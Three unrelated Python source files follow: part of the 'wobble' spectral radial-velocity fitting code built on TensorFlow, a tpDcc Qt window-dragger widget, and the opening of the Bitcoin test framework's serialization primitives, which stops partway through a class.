c.opt_basis_weights = tf.train.AdamOptimizer(c.learning_rate_basis).minimize(self.nll,
var_list=[c.basis_weights], name='opt_minimize_basis_weights_{0}'.format(c.name))
self.updates.append(c.opt_basis_weights)
session = get_session()
session.run(tf.global_variables_initializer())
def optimize(self, niter=100, save_history=False, basename='wobble',
movies=False, epochs_to_plot=[0,1,2], verbose=True,
rv_uncertainties=True, template_uncertainties=False, **kwargs):
"""Optimize the model!
Parameters
----------
niter : `int` (default `100`)
Number of iterations.
save_history : `bool` (default `False`)
If `True`, create a wobble History object to track progress across
iterations and generate plots.
movies : `bool` (default `False`)
Use with `save_history`; if `True`, will generate animations of
optimization progress.
epochs_to_plot : `list` (default `[0,1,2]`)
Use with `save_history`; indices of epochs to plot fits for. Each
epoch will generate its own plot/movies.
basename : `str` (default `wobble`)
Use with `save_history`; path/name stem to use when saving plots.
verbose : `bool` (default `True`)
Toggle print statements and progress bars.
rv_uncertainties : `bool` (default `True`)
Toggle whether RV uncertainty estimates should be calculated.
template_uncertainties : `bool` (default `False`)
Toggle whether template uncertainty estimates should be calculated.
"""
# initialize helper classes:
if save_history:
history = History(self, niter+1)
history.save_iter(self, 0)
# optimize:
session = get_session()
if verbose:
print("optimize: iterating through {0} optimization steps...".format(niter))
iterator = tqdm(range(niter), total=niter, miniters=int(niter/10))
else:
iterator = range(niter)
for i in iterator:
for c in self.components:
if not c.template_fixed:
session.run(c.opt_template, **kwargs)
for c in self.components:
if not c.rvs_fixed:
for _ in range(c.rv_opt_steps):
session.run(c.opt_rvs, **kwargs)
if save_history:
history.save_iter(self, i+1)
self.estimate_uncertainties(verbose=verbose, rvs=rv_uncertainties,
templates=template_uncertainties)
# copy over the outputs to Results:
for c in self.components:
self.results.update(c)
self.results.ys_predicted[self.r] = session.run(self.synth)
# save optimization plots:
if save_history:
history.save_plots(basename, movies=movies, epochs_to_plot=epochs_to_plot)
return history
def estimate_uncertainties(self, verbose=True, rvs=True, templates=False):
"""Estimate uncertainties using the second derivative of the likelihood.
Parameters
----------
verbose : `bool` (default `True`)
Toggle print statements and progress bars.
rvs : `bool` (default `True`)
Calculate uncertainties for rvs.
templates : `bool` (default `False`)
Calculate uncertainties for template_ys. (NOTE: this will take a while!)
"""
session = get_session()
for c in self.components:
attrs = []
ivar_attrs = []
epsilon = []
if rvs and not c.rvs_fixed:
attrs.append('rvs')
ivar_attrs.append('ivars_rvs') # TODO: make ivars names consistent
if templates and not c.template_fixed:
attrs.append('template_ys')
ivar_attrs.append('template_ivars')
for attr, ivar_attr in zip(attrs, ivar_attrs):
if attr == 'rvs':
epsilon = 10. # perturb by a few m/s - TODO: scale this with spectrum SNR!
else:
epsilon = 0.01 # perturb by 1%
best_values = session.run(getattr(c, attr))
N_var = len(best_values) # number of variables in attribute
N_grid = 5
if verbose:
print("optimize: calculating uncertainties on {0} {1}...".format(c.name, attr))
iterator = tqdm(range(N_var), total=N_var,
miniters=int(N_var/20))
else:
iterator = range(N_var)
for n in iterator: # get d2nll/drv2 from gradients
grid = np.tile(best_values, (N_grid,1))
grid[:,n] += np.linspace(-epsilon, epsilon, N_grid) # vary according to epsilon scale
dnll_dattr_grid = [session.run(getattr(c,'dnll_d{0}'.format(attr)),
feed_dict={getattr(c,attr):g})[0][n] for g in grid]
# fit a slope with linear algebra
A = np.array(grid[:,n]) - best_values[n]
ATA = np.dot(A, A)
ATy = np.dot(A, np.array(dnll_dattr_grid))
getattr(c,ivar_attr)[n] = ATy / ATA
# TODO: set ivars for basis vectors, basis weights
class Component(object):
"""
Generic class for an additive component in the spectral model.
You will probably never need to call this class directly.
Instead, use wobble.Model.add_component() to append an instance
of this object to the list saved as wobble.Model.components.
Parameters
----------
name : `str`
The name of the component. Must be unique within the model.
r : `int`
the index of the order to be fit in the data. Must be the same as
`Model.r`.
starting_rvs : `np.ndarray`
N-epoch length vector of initial guesses for RVs; will be used
to stack & average data resids for initialization of the template.
epoch_mask : `np.ndarray` of type `bool`
N-epoch mask where epoch_mask[n] = `True` indicates that this
component contributes to the model at epoch n.
rvs_fixed : `bool` (default `False`)
If `True`, fix the RVs to their initial values and do not
optimize.
template_fixed : `bool` (default `False`)
If `True`, fix the template to its initial values and do not
optimize.
rv_opt_steps : `int` (default `1`)
Number of times to step the RV optimizer every time the
template optimizer is stepped.
variable_bases : `int` (default `0`)
Number of basis vectors to use in time variability of `template_ys`.
If zero, no time variability is allowed.
scale_by_airmass : `bool` (default `False`)
If `True`, component contribution to the model scales linearly with
airmass.
template_xs : `np.ndarray` or `None` (default `None`)
Grid of x-values for the spectral template in the same units as
data `xs`. If `None`, generate automatically upon initialization.
template_ys : `np.ndarray` or `None` (default `None`)
Grid of starting guess y-values for the spectral template
in the same units as data `ys`.
If `None`, generate automatically upon initialization.
If not `None`, `template_xs` must be provided in the same shape.
initialize_at_zero : `bool` (default `False`)
If `True`, initialize template as a flat continuum. Equivalent to
providing a vector of zeros with `template_ys` keyword but does
not require passing a `template_xs` keyword.
learning_rate_rvs : `float` (default 1.)
Learning rate for Tensorflow Adam optimizer to use in `rvs`
optimization step.
learning_rate_template : `float` (default 0.01)
Learning rate for Tensorflow Adam optimizer to use in `template_ys`
optimization step.
learning_rate_basis : `float` (default 0.01)
Learning rate for Tensorflow Adam optimizer to use in `basis_vectors`
optimization step.
regularization_par_file : `str` or `None` (default `None`)
Name of HDF5 file containing the expected regularization amplitudes.
If keyword arguments are set for any of these amplitudes, that value
is used instead of file contents. If `None` & no keywords, no
regularization is used.
L1_template : `float` (default `0`)
L1 regularization amplitude on `self.template_ys`. If zero, no
regularization is used. If not explicitly specified and a valid
`regularization_par_file` is given, value from there is used.
L2_template : `float` (default `0`)
L2 regularization amplitude on `self.template_ys`. If zero, no
regularization is used. If not explicitly specified and a valid
`regularization_par_file` is given, value from there is used.
L1_basis_vectors : `float` (default `0`)
L1 regularization amplitude on `self.basis_vectors`. If zero, no
regularization is used. If not explicitly specified and a valid
`regularization_par_file` is given, value from there is used.
Only set if `variable_bases` > 0.
    L2_basis_vectors : `float` (default `0`)
L2 regularization amplitude on `self.basis_vectors`. If zero, no
regularization is used. If not explicitly specified and a valid
`regularization_par_file` is given, value from there is used.
Only set if `variable_bases` > 0.
    L2_basis_weights : `float` (default `1`)
        L2 regularization amplitude on `self.basis_weights`. If zero, no
regularization is used. If not explicitly specified and a valid
`regularization_par_file` is given, value from there is used.
Only set if `variable_bases` > 0.
Not recommended to change, as this is degenerate with basis vectors.
"""
def __init__(self, name, r, starting_rvs, epoch_mask,
rvs_fixed=False, template_fixed=False, rv_opt_steps = 1,
variable_bases=0, scale_by_airmass=False,
template_xs=None, template_ys=None, initialize_at_zero=False,
learning_rate_rvs=1., learning_rate_template=0.01,
learning_rate_basis=0.01, regularization_par_file=None,
**kwargs):
for attr in ['name', 'r', 'starting_rvs', 'epoch_mask',
'rvs_fixed', 'template_fixed', 'rv_opt_steps',
'template_xs', 'template_ys', 'initialize_at_zero',
'learning_rate_rvs', 'learning_rate_template',
'learning_rate_basis', 'scale_by_airmass']:
setattr(self, attr, eval(attr))
self.K = variable_bases # number of variable basis vectors
self.N = len(starting_rvs)
self.ivars_rvs = np.zeros_like(starting_rvs) + 10. # will be overwritten
regularization_par = ['L1_template', 'L2_template']
if self.K > 0:
regularization_par = np.append(regularization_par,
['L1_basis_vectors', 'L2_basis_vectors', 'L2_basis_weights'])
self.regularization_par = regularization_par # the names of the regularization parameters
default_regularization_par = {'L1_template':0., 'L2_template':0.,
'L1_basis_vectors':0., 'L2_basis_vectors':0.,
                                      'L2_basis_weights':1.}
for par in regularization_par:
if par in kwargs.keys(): # prioritize explicitly set keywords over all else
setattr(self, par, kwargs[par])
elif regularization_par_file is not None: # try setting from file
try:
with h5py.File(regularization_par_file,'r') as f:
setattr(self, par, np.copy(f[par][r]))
                except Exception:
print('Regularization parameter file {0} not recognized; \
adopting default values instead.'.format(regularization_par_file))
setattr(self, par, default_regularization_par[par])
else: # if no file & no keyword argument, set to defaults
setattr(self, par, default_regularization_par[par])
def __repr__(self):
return "wobble.Component named {0}".format(self.name)
def setup(self, data, r):
"""Do TensorFlow magic & define likelihoods in prep for optimizing"""
self.starting_rvs[np.isnan(self.starting_rvs)] = 0. # because introducing NaNs to synth will fail
# Make some TENSORS (hell yeah)
self.rvs = tf.Variable(self.starting_rvs, dtype=T, name='rvs_'+self.name)
self.template_xs = tf.constant(self.template_xs, dtype=T, name='template_xs_'+self.name)
self.template_ys = tf.Variable(self.template_ys, dtype=T, name='template_ys_'+self.name)
if self.K > 0:
self.basis_vectors = tf.Variable(self.basis_vectors, dtype=T, name='basis_vectors_'+self.name)
self.basis_weights = tf.Variable(self.basis_weights, dtype=T, name='basis_weights_'+self.name)
self.data_xs = tf.constant(data.xs[r], dtype=T, name='data_xs_'+self.name)
# Set up the regularization
for name in self.regularization_par:
setattr(self, name+'_tensor', tf.constant(getattr(self,name), dtype=T, name=name+'_'+self.name))
self.nll = tf.multiply(self.L1_template_tensor, tf.reduce_sum(tf.abs(self.template_ys)),
name='L1_template_'+self.name)
self.nll = tf.add(self.nll, tf.multiply(self.L2_template_tensor,
tf.reduce_sum(tf.square(self.template_ys)),
name='L2_template_'+self.name),
name='L1_plus_L2_template_'+self.name)
if self.K > 0:
self.nll = tf.add(self.nll, tf.multiply(self.L1_basis_vectors_tensor,
tf.reduce_sum(tf.abs(self.basis_vectors))))
self.nll = tf.add(self.nll, tf.multiply(self.L2_basis_vectors_tensor,
tf.reduce_sum(tf.square(self.basis_vectors))))
self.nll = tf.add(self.nll, tf.multiply(self.L2_basis_weights_tensor,
tf.reduce_sum(tf.square(self.basis_weights))))
# Apply doppler and synthesize component model predictions
shifted_xs = tf.add(self.data_xs, tf.math.log(doppler(self.rvs))[:, None], name='shifted_xs_'+self.name)
inner_zeros = tf.zeros(shifted_xs.shape[:-1], dtype=T)
expand_inner = lambda x: tf.add(x, inner_zeros[..., None], name='expand_inner_'+self.name)
if self.K == 0:
self.synth = interp(shifted_xs,
expand_inner(self.template_xs),
expand_inner(self.template_ys))
else:
full_template = tf.add(self.template_ys[None,:], tf.matmul(self.basis_weights,
self.basis_vectors))
self.synth = interp(shifted_xs, expand_inner(self.template_xs), full_template)
# Apply other scaling factors to model
if self.scale_by_airmass:
self.synth = tf.einsum('n,nm->nm',tf.constant(data.airms, dtype=T), self.synth,
name='airmass_einsum_'+self.name)
#self.synth = tf.add(self.synth, tf.constant(np.log(data.airms[:,None]), dtype=T),
# name=f'airmass_log_add_{self.name}')
        A = tf.constant(self.epoch_mask.astype('float'), dtype=T) # epoch mask as 0/1 floats
self.synth = tf.multiply(A[:,None], self.synth, name='epoch_masking_'+self.name)
#self.synth = tf.einsum('n,nm->nm', A, self.synth, name='epoch_masking_'+self.name)
def initialize_template(self, data_xs, data_ys, data_ivars):
"""Doppler-shift data into component rest frame and average
to make a composite spectrum. Returns residuals after removing this
component from the data.
Must be done BEFORE running `Component.setup()`.
NOTE: if epochs are masked out, this code implicitly relies on their RVs being NaNs.
"""
N = len(self.starting_rvs)
shifted_xs = data_xs + np.log(doppler(self.starting_rvs[:, None], tensors=False)) # component rest frame
if self.template_xs is None:
dx = 2.*(np.log(6000.01) - np.log(6000.)) # log-uniform spacing
tiny = 10.
self.template_xs = np.arange(np.nanmin(shifted_xs)-tiny*dx,
np.nanmax(shifted_xs)+tiny*dx, dx)
if self.template_ys is None:
if self.initialize_at_zero:
template_ys = np.zeros_like(self.template_xs)
else:
template_ys = bin_data(shifted_xs, data_ys, data_ivars, self.template_xs)
self.template_ys = template_ys
self.template_ivars = np.zeros_like(self.template_ys)
full_template = self.template_ys[None,:] + np.zeros((N,len(self.template_ys)))
if self.K > 0:
# initialize basis components
resids = np.empty((np.sum(self.epoch_mask),len(self.template_ys)))
i = 0
for n in range(N): # populate resids with informative epochs
if self.epoch_mask[n]: # this epoch contains the component
resids[i] = np.interp(self.template_xs, shifted_xs[n], data_ys[n]) - self.template_ys
i += 1
u,s,v = np.linalg.svd(resids, compute_uv=True, full_matrices=False)
basis_vectors = v[:self.K,:] # eigenspectra (K x M)
basis_weights = u[:, :self.K] * s[None, :self.K] # weights (N x K)
self.basis_vectors = basis_vectors
# pad out basis_weights with zeros for data epochs not used:
basis_weights_all = np.zeros((len(self.starting_rvs), self.K))
basis_weights_all[self.epoch_mask,:] = basis_weights
self.basis_weights = basis_weights_all
full_template += np.dot(self.basis_weights, self.basis_vectors)
data_resids = np.copy(data_ys)
for n in range(N):
if self.epoch_mask[n]:
data_resids[n] -= np.interp(shifted_xs[n], self.template_xs, full_template[n])
return data_resids
class Continuum(Component):
"""
Polynomial continuum component which is modeled in data space
"""
def __init__(self, r, N, degree, **kwargs):
Component.__init__(self, 'continuum', r, np.zeros(N),
rvs_fixed=True, variable_bases=0, scale_by_airmass=False, **kwargs)
self.degree = degree
def setup(self, data, r):
self.template_xs = tf.constant(self.wavelength_matrix, dtype=T, name='wavelength_matrix_'+self.name)
self.template_ys = tf.Variable(self.weights, dtype=T, name='weights_'+self.name) # HACK to play well with Results
self.rvs = tf.constant(self.starting_rvs, dtype=T, name='rvs_'+self.name) # HACK to play well with Results
self.synth = tf.matmul(self.template_ys, self.template_xs)
self.nll = tf.constant(0., dtype=T) # no regularization
def initialize_template(self, data_xs, data_ys, data_ivars):
assert np.all(data_xs[0] == data_xs[1]), "Continuum failed: wavelength grid must be constant in time"
wavelength_vector = (data_xs[0] - np.mean(data_xs[0]))/(np.max(data_xs[0]) - np.min(data_xs[0]))
        self.wavelength_matrix = np.array([wavelength_vector**d for d in range(1,self.degree)]) # (degree-1) x M_pixels, constant term excluded
        self.weights = np.zeros((self.N, self.degree-1)) # N_epochs x (degree-1)
return data_ys
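# A minimal usage sketch (assumes `data` and `results` are already-constructed
# wobble Data and Results objects; order index 0 is arbitrary):
# model = Model(data, results, 0)
# model.add_star('star')
# model.add_telluric('tellurics')
# model.optimize(niter=80)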
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Module that contains widgets to drag PySide windows and dialogs
"""
from __future__ import print_function, division, absolute_import
from Qt.QtCore import Qt, Signal, QPoint, QSize, QTimer
from Qt.QtWidgets import QApplication, QWidget, QFrame, QPushButton
from Qt.QtGui import QPainter
from tpDcc import dcc
from tpDcc.managers import resources
from tpDcc.libs.python import python
from tpDcc.libs.qt.core import qtutils
from tpDcc.libs.qt.widgets import layouts, label, dividers
class WindowDragger(QFrame, object):
"""
Class to create custom window dragger for Solstice Tools
"""
DEFAULT_LOGO_ICON_SIZE = 22
doubleClicked = Signal()
def __init__(self, window=None, on_close=None):
super(WindowDragger, self).__init__(parent=window)
self._window = window
self._dragging_enabled = True
self._lock_window_operations = False
self._mouse_press_pos = None
self._mouse_move_pos = None
self._dragging_threshold = 5
self._minimize_enabled = True
self._maximize_enabled = True
self._on_close = on_close
self.setObjectName('titleFrame')
self.ui()
# =================================================================================================================
# PROPERTIES
# =================================================================================================================
@property
def contents_layout(self):
return self._contents_layout
@property
def corner_contents_layout(self):
return self._corner_contents_layout
# =================================================================================================================
# OVERRIDES
# =================================================================================================================
def mousePressEvent(self, event):
if event.button() == Qt.LeftButton and self._dragging_enabled:
self._mouse_press_pos = event.globalPos()
self._mouse_move_pos = event.globalPos() - self._window.pos()
super(WindowDragger, self).mousePressEvent(event)
def mouseMoveEvent(self, event):
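        # Drag sketch: _mouse_press_pos anchors the press in global
        # coordinates while _mouse_move_pos caches the press offset inside
        # the window; once the cursor travels past _dragging_threshold the
        # window is moved so the cursor keeps that same offset.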
if event.buttons() & Qt.LeftButton:
global_pos = event.globalPos()
if self._mouse_press_pos and self._dragging_enabled:
moved = global_pos - self._mouse_press_pos
if moved.manhattanLength() > self._dragging_threshold:
diff = global_pos - self._mouse_move_pos
self._window.move(diff)
self._mouse_move_pos = global_pos - self._window.pos()
super(WindowDragger, self).mouseMoveEvent(event)
def mouseDoubleClickEvent(self, event):
if self._lock_window_operations:
return
if self._button_maximized.isVisible():
self._on_maximize_window()
else:
self._on_restore_window()
super(WindowDragger, self).mouseDoubleClickEvent(event)
self.doubleClicked.emit()
def mouseReleaseEvent(self, event):
if self._mouse_press_pos is not None:
if event.button() == Qt.LeftButton and self._dragging_enabled:
moved = event.globalPos() - self._mouse_press_pos
if moved.manhattanLength() > self._dragging_threshold:
event.ignore()
self._mouse_press_pos = None
super(WindowDragger, self).mouseReleaseEvent(event)
# =================================================================================================================
# BASE
# =================================================================================================================
def ui(self):
self.setFixedHeight(qtutils.dpi_scale(40))
main_layout = layouts.HorizontalLayout(spacing=2, margins=(5, 0, 5, 0))
self.setLayout(main_layout)
self._logo_button = self._setup_logo_button()
self._setup_logo_button_actions(self._logo_button)
self._title_text = label.ClippedLabel(text=self._window.windowTitle())
self._title_text.setObjectName('WindowDraggerLabel')
self._contents_layout = layouts.HorizontalLayout(spacing=0, margins=(0, 0, 0, 0))
self._corner_contents_layout = layouts.HorizontalLayout(spacing=0, margins=(0, 0, 0, 0))
vertical_separator1 = dividers.get_vertical_separator_widget(parent=self)
vertical_separator2 = dividers.get_vertical_separator_widget(parent=self)
main_layout.addWidget(self._logo_button)
main_layout.addWidget(vertical_separator1)
main_layout.addWidget(self._title_text)
main_layout.addWidget(vertical_separator2)
main_layout.addLayout(self._contents_layout)
main_layout.addStretch()
main_layout.addLayout(self._corner_contents_layout)
self._vertical_separators = [vertical_separator1, vertical_separator2]
self._buttons_widget = QWidget()
self.buttons_layout = layouts.HorizontalLayout(spacing=0, margins=(0, 0, 0, 0))
self.buttons_layout.setAlignment(Qt.AlignRight)
self._buttons_widget.setLayout(self.buttons_layout)
main_layout.addWidget(self._buttons_widget)
self._button_minimized = QPushButton()
self._button_minimized.setIconSize(QSize(25, 25))
# self._button_minimized.setSizePolicy(QSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed))
self._button_minimized.setIcon(resources.icon('minimize', theme='window'))
self._button_minimized.setStyleSheet('QWidget {background-color: rgba(255, 255, 255, 0); border:0px;}')
self._button_maximized = QPushButton()
self._button_maximized.setIcon(resources.icon('maximize', theme='window'))
# self._button_maximized.setSizePolicy(QSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed))
self._button_maximized.setStyleSheet('QWidget {background-color: rgba(255, 255, 255, 0); border:0px;}')
self._button_maximized.setIconSize(QSize(25, 25))
self._button_restored = QPushButton()
# self._button_restored.setSizePolicy(QSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed))
self._button_restored.setVisible(False)
self._button_restored.setIcon(resources.icon('restore', theme='window'))
self._button_restored.setStyleSheet('QWidget {background-color: rgba(255, 255, 255, 0); border:0px;}')
self._button_restored.setIconSize(QSize(25, 25))
self._button_closed = QPushButton()
# button_closed.setSizePolicy(QSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed))
self._button_closed.setIcon(resources.icon('close', theme='window'))
self._button_closed.setStyleSheet('QWidget {background-color: rgba(255, 255, 255, 0); border:0px;}')
self._button_closed.setIconSize(QSize(25, 25))
self.buttons_layout.addWidget(self._button_minimized)
self.buttons_layout.addWidget(self._button_maximized)
self.buttons_layout.addWidget(self._button_restored)
self.buttons_layout.addWidget(self._button_closed)
self._button_maximized.clicked.connect(self._on_maximize_window)
self._button_minimized.clicked.connect(self._on_minimize_window)
self._button_restored.clicked.connect(self._on_restore_window)
self._button_closed.clicked.connect(self._on_close_window)
def set_icon(self, icon=None, highlight=False):
"""
Sets the icon of the window dragger
:param icon: QIcon
:param highlight: bool
"""
icon = icon or self._window.windowIcon()
if icon and python.is_string(icon):
icon = resources.icon(icon)
if not icon or icon.isNull():
icon = resources.icon('tpDcc')
size = self.DEFAULT_LOGO_ICON_SIZE
if highlight:
self._logo_button.set_icon(
[icon], colors=[None], tint_composition=QPainter.CompositionMode_Plus, size=size,
icon_scaling=[1], color_offset=0, grayscale=True)
else:
self._logo_button.set_icon([icon], colors=None, size=size, icon_scaling=[1], color_offset=0)
self._logo_button.set_icon_idle(icon)
# self._lbl_icon.setPixmap(icon.pixmap(icon.actualSize(QSize(24, 24))))
def set_icon_hover(self, icon=None):
"""
Sets the icon hover of the window dragger
:param icon: QIcon
"""
icon = icon or self._window.windowIcon()
if icon and python.is_string(icon):
icon = resources.icon(icon)
if not icon or icon.isNull():
icon = resources.icon('tpDcc')
self._logo_button.set_icon_hover(icon)
def set_height(self, value):
"""
Sets the size of the dragger and updates icon
:param value: float
"""
self.setFixedHeight(qtutils.dpi_scale(value))
def set_title(self, title):
"""
Sets the title of the window dragger
:param title: str
"""
self._title_text.setText(title)
def set_dragging_enabled(self, flag):
"""
Sets whether or not drag functionality is enabled
:param flag: bool
"""
self._dragging_enabled = flag
def set_minimize_enabled(self, flag):
"""
Sets whether dragger shows minimize button or not
:param flag: bool
"""
self._minimize_enabled = flag
self._button_minimized.setVisible(flag)
def set_maximized_enabled(self, flag):
"""
Sets whether dragger shows maximize button or not
:param flag: bool
"""
self._maximize_enabled = flag
self._button_maximized.setVisible(flag)
def show_logo(self):
"""
Shows window logo
"""
self._logo_button.setVisible(True)
def hide_logo(self):
"""
Hides window logo
"""
self._logo_button.setVisible(False)
def set_window_buttons_state(self, state, show_close_button=False):
"""
Sets the state of the dragger buttons
:param state: bool
:param show_close_button: bool
"""
self._lock_window_operations = not state
self._button_closed.setEnabled(state or show_close_button)
self._button_closed.setVisible(state or show_close_button)
if self._maximize_enabled:
self._button_maximized.setEnabled(state)
self._button_maximized.setVisible(state)
else:
self._button_maximized.setEnabled(False)
self._button_maximized.setVisible(False)
if self._minimize_enabled:
self._button_minimized.setEnabled(state)
self._button_minimized.setVisible(state)
else:
self._button_minimized.setEnabled(False)
self._button_minimized.setVisible(False)
if not state:
self._button_restored.setEnabled(state)
self._button_restored.setVisible(state)
else:
if self.isMaximized():
self._button_restored.setEnabled(state)
self._button_restored.setVisible(state)
def set_frameless_enabled(self, frameless=False):
"""
Enables/Disables frameless mode or OS system default
:param frameless: bool
"""
from tpDcc.managers import tools
tool_inst = tools.ToolsManager().get_tool_by_plugin_instance(self._window)
if not tool_inst:
return
offset = QPoint()
if self._window.docked():
rect = self._window.rect()
pos = self._window.mapToGlobal(QPoint(-10, -10))
rect.setWidth(rect.width() + 21)
self._window.close()
else:
rect = self.window().rect()
pos = self.window().pos()
offset = QPoint(3, 15)
self.window().close()
tool_inst._launch(launch_frameless=frameless)
new_tool = tool_inst.latest_tool()
QTimer.singleShot(
0, lambda: new_tool.window().setGeometry(
pos.x() + offset.x(), pos.y() + offset.y(), rect.width(), rect.height()))
new_tool.framelessChanged.emit(frameless)
QApplication.processEvents()
return new_tool
def _setup_logo_button(self):
"""
Internal function that setup window dragger button logo
:return: IconMenuButton
"""
# To avoid cyclic imports
from tpDcc.libs.qt.widgets import buttons
logo_button = buttons.IconMenuButton(parent=self)
logo_button.setIconSize(QSize(24, 24))
logo_button.setFixedSize(QSize(30, 30))
logo_button.set_menu_align(Qt.AlignLeft)
return logo_button
def _setup_logo_button_actions(self, logo_button):
"""
Internal function that setup window dragger button logo actions
"""
if not logo_button:
return
self._toggle_frameless = logo_button.addAction(
'Toggle Frameless Mode', connect=self._on_toggle_frameless_mode, checkable=True)
self._toggle_frameless.setChecked(self._window.is_frameless())
if dcc.is_maya() and dcc.get_version() >= 2022:
self._toggle_frameless.setText('Toggle Frameless Mode (not available)')
self._toggle_frameless.setEnabled(False)
def _on_toggle_frameless_mode(self, action):
"""
Internal callback function that is called when switch frameless mode button is pressed by user
        :param action: QAction
"""
self.set_frameless_enabled(action.isChecked())
def _on_maximize_window(self):
"""
Internal callback function that is called when the user clicks on maximize button
"""
self._button_restored.setVisible(True)
self._button_maximized.setVisible(False)
self._window.setWindowState(Qt.WindowMaximized)
def _on_minimize_window(self):
"""
Internal callback function that is called when the user clicks on minimize button
"""
self._window.setWindowState(Qt.WindowMinimized)
def _on_restore_window(self):
"""
Internal callback function that is called when the user clicks on restore button
"""
self._button_restored.setVisible(False)
self._button_maximized.setVisible(True)
self._window.setWindowState(Qt.WindowNoState)
def _on_close_window(self):
"""
Internal callback function that is called when the user clicks on close button
"""
from tpDcc.managers import tools
closed = False
if hasattr(self._window, 'WindowId'):
closed = tools.ToolsManager().close_tool(self._window.WindowId, force=False)
if not closed:
if hasattr(self._window, 'docked'):
if self._window.docked():
self._window.fade_close()
else:
self.window().fade_close()
else:
self._window.fade_close()
class DialogDragger(WindowDragger, object):
def __init__(self, parent=None, on_close=None):
super(DialogDragger, self).__init__(window=parent, on_close=on_close)
for btn in [self._button_maximized, self._button_minimized, self._button_restored]:
btn.setEnabled(False)
btn.setVisible(False)
def mouseDoubleClickEvent(self, event):
return
def _setup_logo_button(self):
"""
Internal function that setup window dragger button logo
:return: IconMenuButton
"""
# To avoid cyclic imports
from tpDcc.libs.qt.widgets import buttons
logo_button = buttons.IconMenuButton(parent=self)
logo_button.setIconSize(QSize(24, 24))
logo_button.setFixedSize(QSize(30, 30))
return logo_button
|
#!/usr/bin/env python3
# Copyright (c) 2010 ArtForz -- public domain half-a-node
# Copyright (c) 2012 Jeff Garzik
# Copyright (c) 2010-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Bitcoin test framework primitive and message strcutures
CBlock, CTransaction, CBlockHeader, CTxIn, CTxOut, etc....:
data structures that should map to corresponding structures in
bitcoin/primitives
msg_block, msg_tx, msg_headers, etc.:
data structures that represent network messages
ser_*, deser_*: functions that handle serialization/deserialization."""
from codecs import encode
import copy
import hashlib
from io import BytesIO
import random
import socket
import struct
import time
from test_framework.siphash import siphash256
from test_framework.util import hex_str_to_bytes, bytes_to_hex_str
MIN_VERSION_SUPPORTED = 60001
MY_VERSION = 70914 # past bip-31 for ping/pong
MY_SUBVERSION = b"/python-mininode-tester:0.0.3/"
MY_RELAY = 1 # from version 70001 onwards, fRelay should be appended to version messages (BIP37)
MAX_INV_SZ = 50000
MAX_BLOCK_BASE_SIZE = 1000000
COIN = 100000000 # 1 btc in satoshis
NODE_NETWORK = (1 << 0)
# NODE_GETUTXO = (1 << 1)
NODE_BLOOM = (1 << 2)
# Serialization/deserialization tools
def sha256(s):
return hashlib.new('sha256', s).digest()
def ripemd160(s):
return hashlib.new('ripemd160', s).digest()
def hash256(s):
return sha256(sha256(s))
def ser_compact_size(l):
r = b""
if l < 253:
r = struct.pack("B", l)
elif l < 0x10000:
r = struct.pack("<BH", 253, l)
elif l < 0x100000000:
r = struct.pack("<BI", 254, l)
else:
r = struct.pack("<BQ", 255, l)
return r
def deser_compact_size(f):
nit = struct.unpack("<B", f.read(1))[0]
if nit == 253:
nit = struct.unpack("<H", f.read(2))[0]
elif nit == 254:
nit = struct.unpack("<I", f.read(4))[0]
elif nit == 255:
nit = struct.unpack("<Q", f.read(8))[0]
return nit
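# A few worked encodings (doctest-style sketch) of the variable-length
# compact-size prefix used throughout this wire format:
#
#   >>> ser_compact_size(100).hex()
#   '64'
#   >>> ser_compact_size(50000).hex()      # 0xfd marker + uint16 LE
#   'fd50c3'
#   >>> ser_compact_size(70000).hex()      # 0xfe marker + uint32 LE
#   'fe70110100'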
def deser_string(f):
nit = deser_compact_size(f)
return f.read(nit)
def ser_string(s):
return ser_compact_size(len(s)) + s
def deser_uint256(f):
r = 0
for i in range(8):
t = struct.unpack("<I", f.read(4))[0]
r += t << (i * 32)
return r
def ser_uint256(u):
rs = b""
for i in range(8):
rs += struct.pack("<I", u & 0xFFFFFFFF)
u >>= 32
return rs
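# Round-trip sketch: ser_uint256 emits eight little-endian 32-bit words, so
# the integer 1 serializes to b'\x01' followed by 31 zero bytes, and
# uint256_from_str(ser_uint256(1)) returns 1.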
def ser_uint64(u):
rs = b""
for i in range(2):
rs += struct.pack("<I", u & 0xFFFFFFFF)
u >>= 32
return rs
def uint256_from_str(s):
r = 0
t = struct.unpack("<IIIIIIII", s[:32])
for i in range(8):
r += t[i] << (i * 32)
return r
def uint256_from_compact(c):
nbytes = (c >> 24) & 0xFF
v = (c & 0xFFFFFF) << (8 * (nbytes - 3))
return v
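# Worked example: the Bitcoin genesis difficulty bits expand as
# uint256_from_compact(0x1d00ffff) == 0xffff << 208, i.e. a mantissa of
# 0x00ffff shifted into a 29-byte-wide target.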
def deser_vector(f, c):
nit = deser_compact_size(f)
r = []
for i in range(nit):
t = c()
t.deserialize(f)
r.append(t)
return r
# ser_function_name: Allow for an alternate serialization function on the
# entries in the vector (we use this for serializing the vector of transactions
# for a witness block).
def ser_vector(l, ser_function_name=None):
r = ser_compact_size(len(l))
for i in l:
if ser_function_name:
r += getattr(i, ser_function_name)()
else:
r += i.serialize()
return r
def deser_uint256_vector(f):
nit = deser_compact_size(f)
r = []
for i in range(nit):
t = deser_uint256(f)
r.append(t)
return r
def ser_uint256_vector(l):
r = ser_compact_size(len(l))
for i in l:
r += ser_uint256(i)
return r
def deser_string_vector(f):
nit = deser_compact_size(f)
r = []
for i in range(nit):
t = deser_string(f)
r.append(t)
return r
def ser_string_vector(l):
r = ser_compact_size(len(l))
for sv in l:
r += ser_string(sv)
return r
# Deserialize from a hex string representation (eg from RPC)
def FromHex(obj, hex_string):
obj.deserialize(BytesIO(hex_str_to_bytes(hex_string)))
return obj
# Convert a binary-serializable object to hex (eg for submission via RPC)
def ToHex(obj):
return bytes_to_hex_str(obj.serialize())
# Objects that map to bitcoind objects, which can be serialized/deserialized
class CAddress():
def __init__(self):
self.nServices = 1
self.pchReserved = b"\x00" * 10 + b"\xff" * 2
self.ip = "0.0.0.0"
self.port = 0
def deserialize(self, f):
self.nServices = struct.unpack("<Q", f.read(8))[0]
self.pchReserved = f.read(12)
self.ip = socket.inet_ntoa(f.read(4))
self.port = struct.unpack(">H", f.read(2))[0]
